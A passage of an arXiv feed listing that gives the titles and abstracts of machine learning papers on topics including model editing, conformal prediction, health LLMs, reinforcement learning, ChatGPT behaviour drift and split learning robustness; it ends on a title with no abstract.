    Edit at your own risk: evaluating the robustness of edited models to distribution shifts. (arXiv:2303.00046v2 [cs.LG] UPDATED)
    The current trend toward ever-larger models makes standard retraining procedures an ever-more expensive burden. For this reason, there is growing interest in model editing, which enables computationally inexpensive, interpretable, post-hoc model modifications. While many model editing techniques are promising, research on the properties of edited models is largely limited to evaluation of validation accuracy. The robustness of edited models is an important and yet mostly unexplored topic. In this paper, we employ recently developed techniques from the field of deep learning robustness to investigate both how model editing affects the general robustness of a model, as well as the robustness of the specific behavior targeted by the edit. We find that edits tend to reduce general robustness, but that the degree of degradation depends on the editing algorithm and layers chosen. Motivated by these observations we introduce a new model editing algorithm, 1-layer interpolation (1-LI), which uses weight-space interpolation to navigate the trade-off between editing task accuracy and general robustness.
    Conformal prediction under ambiguous ground truth. (arXiv:2307.09302v1 [cs.LG])
    In safety-critical classification tasks, conformal prediction allows to perform rigorous uncertainty quantification by providing confidence sets including the true class with a user-specified probability. This generally assumes the availability of a held-out calibration set with access to ground truth labels. Unfortunately, in many domains, such labels are difficult to obtain and usually approximated by aggregating expert opinions. In fact, this holds true for almost all datasets, including well-known ones such as CIFAR and ImageNet. Applying conformal prediction using such labels underestimates uncertainty. Indeed, when expert opinions are not resolvable, there is inherent ambiguity present in the labels. That is, we do not have ``crisp'', definitive ground truth labels and this uncertainty should be taken into account during calibration. In this paper, we develop a conformal prediction framework for such ambiguous ground truth settings which relies on an approximation of the underlying posterior distribution of labels given inputs. We demonstrate our methodology on synthetic and real datasets, including a case study of skin condition classification in dermatology.
    Multimodal LLMs for health grounded in individual-specific data. (arXiv:2307.09018v1 [q-bio.QM])
    Foundation large language models (LLMs) have shown an impressive ability to solve tasks across a wide range of fields including health. To effectively solve personalized health tasks, LLMs need the ability to ingest a diversity of data modalities that are relevant to an individual's health status. In this paper, we take a step towards creating multimodal LLMs for health that are grounded in individual-specific data by developing a framework (HeLM: Health Large Language Model for Multimodal Understanding) that enables LLMs to use high-dimensional clinical modalities to estimate underlying disease risk. HeLM encodes complex data modalities by learning an encoder that maps them into the LLM's token embedding space and for simple modalities like tabular data by serializing the data into text. Using data from the UK Biobank, we show that HeLM can effectively use demographic and clinical features in addition to high-dimensional time-series data to estimate disease risk. For example, HeLM achieves an AUROC of 0.75 for asthma prediction when combining tabular and spirogram data modalities compared with 0.49 when only using tabular data. Overall, we find that HeLM outperforms or performs at parity with classical machine learning approaches across a selection of eight binary traits. Furthermore, we investigate the downstream uses of this model such as its generalizability to out-of-distribution traits and its ability to power conversations around individual health and wellness.
    A Unifying Framework for Differentially Private Sums under Continual Observation. (arXiv:2307.08970v1 [cs.LG])
    We study the problem of maintaining a differentially private decaying sum under continual observation. We give a unifying framework and an efficient algorithm for this problem for \emph{any sufficiently smooth} function. Our algorithm is the first differentially private algorithm that does not have a multiplicative error for polynomially-decaying weights. Our algorithm improves on all prior works on differentially private decaying sums under continual observation and recovers exactly the additive error for the special case of continual counting from Henzinger et al. (SODA 2023) as a corollary. Our algorithm is a variant of the factorization mechanism whose error depends on the $\gamma_2$ and $\gamma_F$ norm of the underlying matrix. We give a constructive proof for an almost exact upper bound on the $\gamma_2$ and $\gamma_F$ norm and an almost tight lower bound on the $\gamma_2$ norm for a large class of lower-triangular matrices. This is the first non-trivial lower bound for lower-triangular matrices whose non-zero entries are not all the same. It includes matrices for all continual decaying sums problems, resulting in an upper bound on the additive error of any differentially private decaying sums algorithm under continual observation. We also explore some implications of our result in discrepancy theory and operator algebra. Given the importance of the $\gamma_2$ norm in computer science and the extensive work in mathematics, we believe our result will have further applications.
    Nested Elimination: A Simple Algorithm for Best-Item Identification from Choice-Based Feedback. (arXiv:2307.09295v1 [cs.LG])
    We study the problem of best-item identification from choice-based feedback. In this problem, a company sequentially and adaptively shows display sets to a population of customers and collects their choices. The objective is to identify the most preferred item with the least number of samples and at a high confidence level. We propose an elimination-based algorithm, namely Nested Elimination (NE), which is inspired by the nested structure implied by the information-theoretic lower bound. NE is simple in structure, easy to implement, and has a strong theoretical guarantee for sample complexity. Specifically, NE utilizes an innovative elimination criterion and circumvents the need to solve any complex combinatorial optimization problem. We provide an instance-specific and non-asymptotic bound on the expected sample complexity of NE. We also show NE achieves high-order worst-case asymptotic optimality. Finally, numerical experiments from both synthetic and real data corroborate our theoretical findings.
    Towards Dynamic Causal Discovery with Rare Events: A Nonparametric Conditional Independence Test. (arXiv:2211.16596v5 [stat.ML] UPDATED)
    Causal phenomena associated with rare events occur across a wide range of engineering problems, such as risk-sensitive safety analysis, accident analysis and prevention, and extreme value theory. However, current methods for causal discovery are often unable to uncover causal links, between random variables in a dynamic setting, that manifest only when the variables first experience low-probability realizations. To address this issue, we introduce a novel statistical independence test on data collected from time-invariant dynamical systems in which rare but consequential events occur. In particular, we exploit the time-invariance of the underlying data to construct a superimposed dataset of the system state before rare events happen at different timesteps. We then design a conditional independence test on the reorganized data. We provide non-asymptotic sample complexity bounds for the consistency of our method, and validate its performance across various simulated and real-world datasets, including incident data collected from the Caltrans Performance Measurement System (PeMS). Code containing the datasets and experiments is publicly available.
    Robust Counterfactual Explanations for Neural Networks With Probabilistic Guarantees. (arXiv:2305.11997v2 [stat.ML] UPDATED)
    There is an emerging interest in generating robust counterfactual explanations that would remain valid if the model is updated or changed even slightly. Towards finding robust counterfactuals, existing literature often assumes that the original model $m$ and the new model $M$ are bounded in the parameter space, i.e., $\|\text{Params}(M){-}\text{Params}(m)\|{<}\Delta$. However, models can often change significantly in the parameter space with little to no change in their predictions or accuracy on the given dataset. In this work, we introduce a mathematical abstraction termed \emph{naturally-occurring} model change, which allows for arbitrary changes in the parameter space such that the change in predictions on points that lie on the data manifold is limited. Next, we propose a measure -- that we call \emph{Stability} -- to quantify the robustness of counterfactuals to potential model changes for differentiable models, e.g., neural networks. Our main contribution is to show that counterfactuals with sufficiently high value of \emph{Stability} as defined by our measure will remain valid after potential ``naturally-occurring'' model changes with high probability (leveraging concentration bounds for Lipschitz function of independent Gaussians). Since our quantification depends on the local Lipschitz constant around a data point which is not always available, we also examine practical relaxations of our proposed measure and demonstrate experimentally how they can be incorporated to find robust counterfactuals for neural networks that are close, realistic, and remain valid after potential model changes. This work also has interesting connections with model multiplicity, also known as, the Rashomon effect.
    Data Cross-Segmentation for Improved Generalization in Reinforcement Learning Based Algorithmic Trading. (arXiv:2307.09377v1 [cs.LG])
    The use of machine learning in algorithmic trading systems is increasingly common. In a typical set-up, supervised learning is used to predict the future prices of assets, and those predictions drive a simple trading and execution strategy. This is quite effective when the predictions have sufficient signal, markets are liquid, and transaction costs are low. However, those conditions often do not hold in thinly traded financial markets and markets for differentiated assets such as real estate or vehicles. In these markets, the trading strategy must consider the long-term effects of taking positions that are relatively more difficult to change. In this work, we propose a Reinforcement Learning (RL) algorithm that trades based on signals from a learned predictive model and addresses these challenges. We test our algorithm on 20+ years of equity data from Bursa Malaysia.
    How is ChatGPT's behavior changing over time?. (arXiv:2307.09009v1 [cs.CL])
    GPT-3.5 and GPT-4 are the two most widely used large language model (LLM) services. However, when and how these models are updated over time is opaque. Here, we evaluate the March 2023 and June 2023 versions of GPT-3.5 and GPT-4 on four diverse tasks: 1) solving math problems, 2) answering sensitive/dangerous questions, 3) generating code and 4) visual reasoning. We find that the performance and behavior of both GPT-3.5 and GPT-4 can vary greatly over time. For example, GPT-4 (March 2023) was very good at identifying prime numbers (accuracy 97.6%) but GPT-4 (June 2023) was very poor on these same questions (accuracy 2.4%). Interestingly GPT-3.5 (June 2023) was much better than GPT-3.5 (March 2023) in this task. GPT-4 was less willing to answer sensitive questions in June than in March, and both GPT-4 and GPT-3.5 had more formatting mistakes in code generation in June than in March. Overall, our findings shows that the behavior of the same LLM service can change substantially in a relatively short amount of time, highlighting the need for continuous monitoring of LLM quality.
    Application of BERT in Wind Power Forecasting-Teletraan's Solution in Baidu KDD Cup 2022. (arXiv:2307.09248v1 [cs.LG])
    Nowadays, wind energy has drawn increasing attention as its important role in carbon neutrality and sustainable development. When wind power is integrated into the power grid, precise forecasting is necessary for the sustainability and security of the system. However, the unpredictable nature and long sequence prediction make it especially challenging. In this technical report, we introduce the BERT model applied for Baidu KDD Cup 2022, and the daily fluctuation is added by post-processing to make the predicted results in line with daily periodicity. Our solution achieves 3rd place of 2490 teams. The code is released athttps://github.com/LongxingTan/KDD2022-Baidu
    An Evaluation of Zero-Cost Proxies -- from Neural Architecture Performance to Model Robustness. (arXiv:2307.09365v1 [cs.LG])
    Zero-cost proxies are nowadays frequently studied and used to search for neural architectures. They show an impressive ability to predict the performance of architectures by making use of their untrained weights. These techniques allow for immense search speed-ups. So far the joint search for well-performing and robust architectures has received much less attention in the field of NAS. Therefore, the main focus of zero-cost proxies is the clean accuracy of architectures, whereas the model robustness should play an evenly important part. In this paper, we analyze the ability of common zero-cost proxies to serve as performance predictors for robustness in the popular NAS-Bench-201 search space. We are interested in the single prediction task for robustness and the joint multi-objective of clean and robust accuracy. We further analyze the feature importance of the proxies and show that predicting the robustness makes the prediction task from existing zero-cost proxies more challenging. As a result, the joint consideration of several proxies becomes necessary to predict a model's robustness while the clean accuracy can be regressed from a single such feature.
    Funnel-based Reward Shaping for Signal Temporal Logic Tasks in Reinforcement Learning. (arXiv:2212.03181v2 [eess.SY] UPDATED)
    Signal Temporal Logic (STL) is a powerful framework for describing the complex temporal and logical behaviour of the dynamical system. Numerous studies have attempted to employ reinforcement learning to learn a controller that enforces STL specifications; however, they have been unable to effectively tackle the challenges of ensuring robust satisfaction in continuous state space and maintaining tractability. In this paper, leveraging the concept of funnel functions, we propose a tractable reinforcement learning algorithm to learn a time-dependent policy for robust satisfaction of STL specification in continuous state space. We demonstrate the utility of our approach on several STL tasks using different environments.
    DESCN: Deep Entire Space Cross Networks for Individual Treatment Effect Estimation. (arXiv:2207.09920v2 [cs.LG] UPDATED)
    Causal Inference has wide applications in various areas such as E-commerce and precision medicine, and its performance heavily relies on the accurate estimation of the Individual Treatment Effect (ITE). Conventionally, ITE is predicted by modeling the treated and control response functions separately in their individual sample spaces. However, such an approach usually encounters two issues in practice, i.e. divergent distribution between treated and control groups due to treatment bias, and significant sample imbalance of their population sizes. This paper proposes Deep Entire Space Cross Networks (DESCN) to model treatment effects from an end-to-end perspective. DESCN captures the integrated information of the treatment propensity, the response, and the hidden treatment effect through a cross network in a multi-task learning manner. Our method jointly learns the treatment and response functions in the entire sample space to avoid treatment bias and employs an intermediate pseudo treatment effect prediction network to relieve sample imbalance. Extensive experiments are conducted on a synthetic dataset and a large-scaled production dataset from the E-commerce voucher distribution business. The results indicate that DESCN can successfully enhance the accuracy of ITE estimation and improve the uplift ranking performance. A sample of the production dataset and the source code are released to facilitate future research in the community, which is, to the best of our knowledge, the first large-scale public biased treatment dataset for causal inference.
    Online Observer-Based Inverse Reinforcement Learning. (arXiv:2011.02057v3 [eess.SY] UPDATED)
    In this paper, a novel approach to the output-feedback inverse reinforcement learning (IRL) problem is developed by casting the IRL problem, for linear systems with quadratic cost functions, as a state estimation problem. Two observer-based techniques for IRL are developed, including a novel observer method that re-uses previous state estimates via history stacks. Theoretical guarantees for convergence and robustness are established under appropriate excitation conditions. Simulations demonstrate the performance of the developed observers and filters under noisy and noise-free measurements.
    Extreme heatwave sampling and prediction with analog Markov chain and comparisons with deep learning. (arXiv:2307.09060v1 [physics.ao-ph])
    We present a data-driven emulator, stochastic weather generator (SWG), suitable for estimating probabilities of prolonged heatwaves in France and Scandinavia. This emulator is based on the method of analogs of circulation to which we add temperature and soil moisture as predictor fields. We train the emulator on an intermediate complexity climate model run and show that it is capable of predicting conditional probabilities (forecasting) of heatwaves out of sample. Special attention is payed that this prediction is evaluated using proper score appropriate for rare events. To accelerate the computation of analogs dimensionality reduction techniques are applied and the performance is evaluated. The probabilistic prediction achieved with SWG is compared with the one achieved with Convolutional Neural Network (CNN). With the availability of hundreds of years of training data CNNs perform better at the task of probabilistic prediction. In addition, we show that the SWG emulator trained on 80 years of data is capable of estimating extreme return times of order of thousands of years for heatwaves longer than several days more precisely than the fit based on generalised extreme value distribution. Finally, the quality of its synthetic extreme teleconnection patterns obtained with stochastic weather generator is studied. We showcase two examples of such synthetic teleconnection patterns for heatwaves in France and Scandinavia that compare favorably to the very long climate model control run.
    Enhancing Pattern Classification in Support Vector Machines through Matrix Formulation. (arXiv:2307.09372v1 [cs.LG])
    Support Vector Machines (SVM) have gathered significant acclaim as classifiers due to their successful implementation of Statistical Learning Theory. However, in the context of multiclass and multilabel settings, the reliance on vector-based formulations in existing SVM-based models poses limitations regarding flexibility and ease of incorporating additional terms to handle specific challenges. To overcome these limitations, our research paper focuses on introducing a matrix formulation for SVM that effectively addresses these constraints. By employing the Accelerated Gradient Descent method in the dual, we notably enhance the efficiency of solving the Matrix-SVM problem. Experimental evaluations on multilabel and multiclass datasets demonstrate that Matrix SVM achieves superior time efficacy while delivering similar results to Binary Relevance SVM. Moreover, our matrix formulation unveils crucial insights and advantages that may not be readily apparent in traditional vector-based notations. We emphasize that numerous multilabel models can be viewed as extensions of SVM, with customised modifications to meet specific requirements. The matrix formulation presented in this paper establishes a solid foundation for developing more sophisticated models capable of effectively addressing the distinctive challenges encountered in multilabel learning.
    FakET: Simulating Cryo-Electron Tomograms with Neural Style Transfer. (arXiv:2304.02011v2 [cs.LG] UPDATED)
    Particle localization and -classification constitute two of the most fundamental problems in computational microscopy. In recent years, deep learning based approaches have been introduced for these tasks with great success. A key shortcoming of these supervised learning methods is their need for large training data sets, typically generated from particle models in conjunction with complex numerical forward models simulating the physics of transmission electron microscopes. Computer implementations of such forward models are computationally extremely demanding and limit the scope of their applicability. In this paper we propose a method for simulating the forward operator of an electron microscope based on additive noise and Neural Style Transfer techniques. We evaluate the method on localization and classification tasks using one of the established state-of-the-art architectures showing performance on par with the benchmark. In contrast to previous approaches, our method accelerates the data generation process by a factor of 750 while using 33 times less memory and scales well to typical transmission electron microscope detector sizes. It utilizes GPU acceleration and parallel processing. It can be used to adapt a synthetic training data set according to reference data from any transmission electron microscope. The source code is available at https://gitlab.com/deepet/faket.
    Multi-Player Zero-Sum Markov Games with Networked Separable Interactions. (arXiv:2307.09470v1 [cs.GT])
    We study a new class of Markov games (MGs), \textit{Multi-player Zero-sum Markov Games} with {\it Networked separable interactions} (MZNMGs), to model the local interaction structure in non-cooperative multi-agent sequential decision-making. We define an MZNMG as a model where {the payoffs of the auxiliary games associated with each state are zero-sum and} have some separable (i.e., polymatrix) structure across the neighbors over some interaction network. We first identify the necessary and sufficient conditions under which an MG can be presented as an MZNMG, and show that the set of Markov coarse correlated equilibrium (CCE) collapses to the set of Markov Nash equilibrium (NE) in these games, in that the {product of} per-state marginalization of the former for all players yields the latter. Furthermore, we show that finding approximate Markov \emph{stationary} CCE in infinite-horizon discounted MZNMGs is \texttt{PPAD}-hard, unless the underlying network has a ``star topology''. Then, we propose fictitious-play-type dynamics, the classical learning dynamics in normal-form games, for MZNMGs, and establish convergence guarantees to Markov stationary NE under a star-shaped network structure. Finally, in light of the hardness result, we focus on computing a Markov \emph{non-stationary} NE and provide finite-iteration guarantees for a series of value-iteration-based algorithms. We also provide numerical experiments to corroborate our theoretical results.
    Non-Stationary Policy Learning for Multi-Timescale Multi-Agent Reinforcement Learning. (arXiv:2307.08794v1 [cs.LG])
    In multi-timescale multi-agent reinforcement learning (MARL), agents interact across different timescales. In general, policies for time-dependent behaviors, such as those induced by multiple timescales, are non-stationary. Learning non-stationary policies is challenging and typically requires sophisticated or inefficient algorithms. Motivated by the prevalence of this control problem in real-world complex systems, we introduce a simple framework for learning non-stationary policies for multi-timescale MARL. Our approach uses available information about agent timescales to define a periodic time encoding. In detail, we theoretically demonstrate that the effects of non-stationarity introduced by multiple timescales can be learned by a periodic multi-agent policy. To learn such policies, we propose a policy gradient algorithm that parameterizes the actor and critic with phase-functioned neural networks, which provide an inductive bias for periodicity. The framework's ability to effectively learn multi-timescale policies is validated on a gridworld and building energy management environment.
    Execution-based Code Generation using Deep Reinforcement Learning. (arXiv:2301.13816v3 [cs.LG] UPDATED)
    The utilization of programming language (PL) models, pre-trained on large-scale code corpora, as a means of automating software engineering processes has demonstrated considerable potential in streamlining various code generation tasks such as code completion, code translation, and program synthesis. However, current approaches mainly rely on supervised fine-tuning objectives borrowed from text generation, neglecting unique sequence-level characteristics of code, including but not limited to compilability as well as syntactic and functional correctness. To address this limitation, we propose PPOCoder, a new framework for code generation that synergistically combines pre-trained PL models with Proximal Policy Optimization (PPO) which is a widely used deep reinforcement learning technique. By utilizing non-differentiable feedback from code execution and structure alignment, PPOCoder seamlessly integrates external code-specific knowledge into the model optimization process. It's important to note that PPOCoder is a task-agnostic and model-agnostic framework that can be used across different code generation tasks and PLs. Extensive experiments on three code generation tasks demonstrate the effectiveness of our proposed approach compared to SOTA methods, achieving significant improvements in compilation success rates and functional correctness across different PLs.
    Deep Learning for Mean Field Games with non-separable Hamiltonians. (arXiv:2301.02877v2 [cs.LG] UPDATED)
    This paper introduces a new method based on Deep Galerkin Methods (DGMs) for solving high-dimensional stochastic Mean Field Games (MFGs). We achieve this by using two neural networks to approximate the unknown solutions of the MFG system and forward-backward conditions. Our method is efficient, even with a small number of iterations, and is capable of handling up to 300 dimensions with a single layer, which makes it faster than other approaches. In contrast, methods based on Generative Adversarial Networks (GANs) cannot solve MFGs with non-separable Hamiltonians. We demonstrate the effectiveness of our approach by applying it to a traffic flow problem, which was previously solved using the Newton iteration method only in the deterministic case. We compare the results of our method to analytical solutions and previous approaches, showing its efficiency. We also prove the convergence of our neural network approximation with a single hidden layer using the universal approximation theorem.
    Towards Sustainable Deep Learning for Multi-Label Classification on NILM. (arXiv:2307.09244v1 [cs.LG])
    Non-intrusive load monitoring (NILM) is the process of obtaining appliance-level data from a single metering point, measuring total electricity consumption of a household or a business. Appliance-level data can be directly used for demand response applications and energy management systems as well as for awareness raising and motivation for improvements in energy efficiency and reduction in the carbon footprint. Recently, classical machine learning and deep learning (DL) techniques became very popular and proved as highly effective for NILM classification, but with the growing complexity these methods are faced with significant computational and energy demands during both their training and operation. In this paper, we introduce a novel DL model aimed at enhanced multi-label classification of NILM with improved computation and energy efficiency. We also propose a testing methodology for comparison of different models using data synthesized from the measurement datasets so as to better represent real-world scenarios. Compared to the state-of-the-art, the proposed model has its carbon footprint reduced by more than 23% while providing on average approximately 8 percentage points in performance improvement when testing on data derived from REFIT and UK-DALE datasets.
    Nonlinear Processing with Linear Optics. (arXiv:2307.08533v2 [physics.optics] UPDATED)
    Deep neural networks have achieved remarkable breakthroughs by leveraging multiple layers of data processing to extract hidden representations, albeit at the cost of large electronic computing power. To enhance energy efficiency and speed, the optical implementation of neural networks aims to harness the advantages of optical bandwidth and the energy efficiency of optical interconnections. In the absence of low-power optical nonlinearities, the challenge in the implementation of multilayer optical networks lies in realizing multiple optical layers without resorting to electronic components. In this study, we present a novel framework that uses multiple scattering that is capable of synthesizing programmable linear and nonlinear transformations concurrently at low optical power by leveraging the nonlinear relationship between the scattering potential, represented by data, and the scattered field. Theoretical and experimental investigations show that repeating the data by multiple scattering enables non-linear optical computing at low power continuous wave light.
    Basal-Bolus Advisor for Type 1 Diabetes (T1D) Patients Using Multi-Agent Reinforcement Learning (RL) Methodology. (arXiv:2307.08897v1 [cs.LG])
    This paper presents a novel multi-agent reinforcement learning (RL) approach for personalized glucose control in individuals with type 1 diabetes (T1D). The method employs a closed-loop system consisting of a blood glucose (BG) metabolic model and a multi-agent soft actor-critic RL model acting as the basal-bolus advisor. Performance evaluation is conducted in three scenarios, comparing the RL agents to conventional therapy. Evaluation metrics include glucose levels (minimum, maximum, and mean), time spent in different BG ranges, and average daily bolus and basal insulin dosages. Results demonstrate that the RL-based basal-bolus advisor significantly improves glucose control, reducing glycemic variability and increasing time spent within the target range (70-180 mg/dL). Hypoglycemia events are effectively prevented, and severe hyperglycemia events are reduced. The RL approach also leads to a statistically significant reduction in average daily basal insulin dosage compared to conventional therapy. These findings highlight the effectiveness of the multi-agent RL approach in achieving better glucose control and mitigating the risk of severe hyperglycemia in individuals with T1D.
    FlexiAST: Flexibility is What AST Needs. (arXiv:2307.09286v1 [cs.SD])
    The objective of this work is to give patch-size flexibility to Audio Spectrogram Transformers (AST). Recent advancements in ASTs have shown superior performance in various audio-based tasks. However, the performance of standard ASTs degrades drastically when evaluated using different patch sizes from that used during training. As a result, AST models are typically re-trained to accommodate changes in patch sizes. To overcome this limitation, this paper proposes a training procedure to provide flexibility to standard AST models without architectural changes, allowing them to work with various patch sizes at the inference stage - FlexiAST. This proposed training approach simply utilizes random patch size selection and resizing of patch and positional embedding weights. Our experiments show that FlexiAST gives similar performance to standard AST models while maintaining its evaluation ability at various patch sizes on different datasets for audio classification tasks.
    Oracle Efficient Online Multicalibration and Omniprediction. (arXiv:2307.08999v1 [cs.LG])
    A recent line of work has shown a surprising connection between multicalibration, a multi-group fairness notion, and omniprediction, a learning paradigm that provides simultaneous loss minimization guarantees for a large family of loss functions. Prior work studies omniprediction in the batch setting. We initiate the study of omniprediction in the online adversarial setting. Although there exist algorithms for obtaining notions of multicalibration in the online adversarial setting, unlike batch algorithms, they work only for small finite classes of benchmark functions $F$, because they require enumerating every function $f \in F$ at every round. In contrast, omniprediction is most interesting for learning theoretic hypothesis classes $F$, which are generally continuously large. We develop a new online multicalibration algorithm that is well defined for infinite benchmark classes $F$, and is oracle efficient (i.e. for any class $F$, the algorithm has the form of an efficient reduction to a no-regret learning algorithm for $F$). The result is the first efficient online omnipredictor -- an oracle efficient prediction algorithm that can be used to simultaneously obtain no regret guarantees to all Lipschitz convex loss functions. For the class $F$ of linear functions, we show how to make our algorithm efficient in the worst case. Also, we show upper and lower bounds on the extent to which our rates can be improved: our oracle efficient algorithm actually promises a stronger guarantee called swap-omniprediction, and we prove a lower bound showing that obtaining $O(\sqrt{T})$ bounds for swap-omniprediction is impossible in the online setting. On the other hand, we give a (non-oracle efficient) algorithm which can obtain the optimal $O(\sqrt{T})$ omniprediction bounds without going through multicalibration, giving an information theoretic separation between these two solution concepts.
    Cooperative Multi-Objective Reinforcement Learning for Traffic Signal Control and Carbon Emission Reduction. (arXiv:2306.09662v2 [cs.LG] UPDATED)
    Existing traffic signal control systems rely on oversimplified rule-based methods, and even RL-based methods are often suboptimal and unstable. To address this, we propose a cooperative multi-objective architecture called Multi-Objective Multi-Agent Deep Deterministic Policy Gradient (MOMA-DDPG), which estimates multiple reward terms for traffic signal control optimization using age-decaying weights. Our approach involves two types of agents: one focuses on optimizing local traffic at each intersection, while the other aims to optimize global traffic throughput. We evaluate our method using real-world traffic data collected from an Asian country's traffic cameras. Despite the inclusion of a global agent, our solution remains decentralized as this agent is no longer necessary during the inference stage. Our results demonstrate the effectiveness of MOMA-DDPG, outperforming state-of-the-art methods across all performance metrics. Additionally, our proposed system minimizes both waiting time and carbon emissions. Notably, this paper is the first to link carbon emissions and global agents in traffic signal control.
    Convergent regularization in inverse problems and linear plug-and-play denoisers. (arXiv:2307.09441v1 [math.NA])
    Plug-and-play (PnP) denoising is a popular iterative framework for solving imaging inverse problems using off-the-shelf image denoisers. Their empirical success has motivated a line of research that seeks to understand the convergence of PnP iterates under various assumptions on the denoiser. While a significant amount of research has gone into establishing the convergence of the PnP iteration for different regularity conditions on the denoisers, not much is known about the asymptotic properties of the converged solution as the noise level in the measurement tends to zero, i.e., whether PnP methods are provably convergent regularization schemes under reasonable assumptions on the denoiser. This paper serves two purposes: first, we provide an overview of the classical regularization theory in inverse problems and survey a few notable recent data-driven methods that are provably convergent regularization schemes. We then continue to discuss PnP algorithms and their established convergence guarantees. Subsequently, we consider PnP algorithms with linear denoisers and propose a novel spectral filtering technique to control the strength of regularization arising from the denoiser. Further, by relating the implicit regularization of the denoiser to an explicit regularization functional, we rigorously show that PnP with linear denoisers leads to a convergent regularization scheme. More specifically, we prove that in the limit as the noise vanishes, the PnP reconstruction converges to the minimizer of a regularization potential subject to the solution satisfying the noiseless operator equation. The theoretical analysis is corroborated by numerical experiments for the classical inverse problem of tomographic image reconstruction.
    FedFormer: Contextual Federation with Attention in Reinforcement Learning. (arXiv:2205.13697v3 [cs.LG] CROSS LISTED)
    A core issue in multi-agent federated reinforcement learning is defining how to aggregate insights from multiple agents. This is commonly done by taking the average of each participating agent's model weights into one common model (FedAvg). We instead propose FedFormer, a novel federation strategy that utilizes Transformer Attention to contextually aggregate embeddings from models originating from different learner agents. In so doing, we attentively weigh the contributions of other agents with respect to the current agent's environment and learned relationships, thus providing a more effective and efficient federation. We evaluate our methods on the Meta-World environment and find that our approach yields significant improvements over FedAvg and non-federated Soft Actor-Critic single-agent methods. Our results compared to Soft Actor-Critic show that FedFormer achieves higher episodic return while still abiding by the privacy constraints of federated learning. Finally, we also demonstrate improvements in effectiveness with increased agent pools across all methods in certain tasks. This is contrasted by FedAvg, which fails to make noticeable improvements when scaled.
    Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives. (arXiv:2307.09366v1 [cs.LG])
    We consider the problem of learning a sparse graph underlying an undirected Gaussian graphical model, a key problem in statistical machine learning. Given $n$ samples from a multivariate Gaussian distribution with $p$ variables, the goal is to estimate the $p \times p$ inverse covariance matrix (aka precision matrix), assuming it is sparse (i.e., has a few nonzero entries). We propose GraphL0BnB, a new estimator based on an $\ell_0$-penalized version of the pseudolikelihood function, while most earlier approaches are based on the $\ell_1$-relaxation. Our estimator can be formulated as a convex mixed integer program (MIP) which can be difficult to compute at scale using off-the-shelf commercial solvers. To solve the MIP, we propose a custom nonlinear branch-and-bound (BnB) framework that solves node relaxations with tailored first-order methods. As a by-product of our BnB framework, we propose large-scale solvers for obtaining good primal solutions that are of independent interest. We derive novel statistical guarantees (estimation and variable selection) for our estimator and discuss how our approach improves upon existing estimators. Our numerical experiments on real/synthetic datasets suggest that our method can solve, to near-optimality, problem instances with $p = 10^4$ -- corresponding to a symmetric matrix of size $p \times p$ with $p^2/2$ binary variables. We demonstrate the usefulness of GraphL0BnB versus various state-of-the-art approaches on a range of datasets.
    Joint Microseismic Event Detection and Location with a Detection Transformer. (arXiv:2307.09207v1 [physics.geo-ph])
    Microseismic event detection and location are two primary components in microseismic monitoring, which offers us invaluable insights into the subsurface during reservoir stimulation and evolution. Conventional approaches for event detection and location often suffer from manual intervention and/or heavy computation, while current machine learning-assisted approaches typically address detection and location separately; such limitations hinder the potential for real-time microseismic monitoring. We propose an approach to unify event detection and source location into a single framework by adapting a Convolutional Neural Network backbone and an encoder-decoder Transformer with a set-based Hungarian loss, which is applied directly to recorded waveforms. The proposed network is trained on synthetic data simulating multiple microseismic events corresponding to random source locations in the area of suspected microseismic activities. A synthetic test on a 2D profile of the SEAM Time Lapse model illustrates the capability of the proposed method in detecting the events properly and locating them in the subsurface accurately; while, a field test using the Arkoma Basin data further proves its practicability, efficiency, and its potential in paving the way for real-time monitoring of microseismic events.
    An R package for parametric estimation of causal effects. (arXiv:2307.08686v2 [stat.ME] UPDATED)
    This article explains the usage of R package CausalModels, which is publicly available on the Comprehensive R Archive Network. While packages are available for sufficiently estimating causal effects, there lacks a package that provides a collection of structural models using the conventional statistical approach developed by Hernan and Robins (2020). CausalModels addresses this deficiency of software in R concerning causal inference by offering tools for methods that account for biases in observational data without requiring extensive statistical knowledge. These methods should not be ignored and may be more appropriate or efficient in solving particular problems. While implementations of these statistical models are distributed among a number of causal packages, CausalModels introduces a simple and accessible framework for a consistent modeling pipeline among a variety of statistical methods for estimating causal effects in a single R package. It consists of common methods including standardization, IP weighting, G-estimation, outcome regression, instrumental variables and propensity matching.
    On the Robustness of Split Learning against Adversarial Attacks. (arXiv:2307.07916v2 [cs.LG] UPDATED)
    Split learning enables collaborative deep learning model training while preserving data privacy and model security by avoiding direct sharing of raw data and model details (i.e., sever and clients only hold partial sub-networks and exchange intermediate computations). However, existing research has mainly focused on examining its reliability for privacy protection, with little investigation into model security. Specifically, by exploring full models, attackers can launch adversarial attacks, and split learning can mitigate this severe threat by only disclosing part of models to untrusted servers.This paper aims to evaluate the robustness of split learning against adversarial attacks, particularly in the most challenging setting where untrusted servers only have access to the intermediate layers of the model.Existing adversarial attacks mostly focus on the centralized setting instead of the collaborative setting, thus, to better evaluate the robustness of split learning, we develop a tailored attack called SPADV, which comprises two stages: 1) shadow model training that addresses the issue of lacking part of the model and 2) local adversarial attack that produces adversarial examples to evaluate.The first stage only requires a few unlabeled non-IID data, and, in the second stage, SPADV perturbs the intermediate output of natural samples to craft the adversarial ones. The overall cost of the proposed attack process is relatively low, yet the empirical attack effectiveness is significantly high, demonstrating the surprising vulnerability of split learning to adversarial attacks.
    Scalable Coupling of Deep Learning with Logical Reasoning. (arXiv:2305.07617v2 [cs.AI] UPDATED)
    In the ongoing quest for hybridizing discrete reasoning with neural nets, there is an increasing interest in neural architectures that can learn how to solve discrete reasoning or optimization problems from natural inputs. In this paper, we introduce a scalable neural architecture and loss function dedicated to learning the constraints and criteria of NP-hard reasoning problems expressed as discrete Graphical Models. Our loss function solves one of the main limitations of Besag's pseudo-loglikelihood, enabling learning of high energies. We empirically show it is able to efficiently learn how to solve NP-hard reasoning problems from natural inputs as the symbolic, visual or many-solutions Sudoku problems as well as the energy optimization formulation of the protein design problem, providing data efficiency, interpretability, and \textit{a posteriori} control over predictions.
    Siamese Networks for Weakly Supervised Human Activity Recognition. (arXiv:2307.08944v1 [cs.HC])
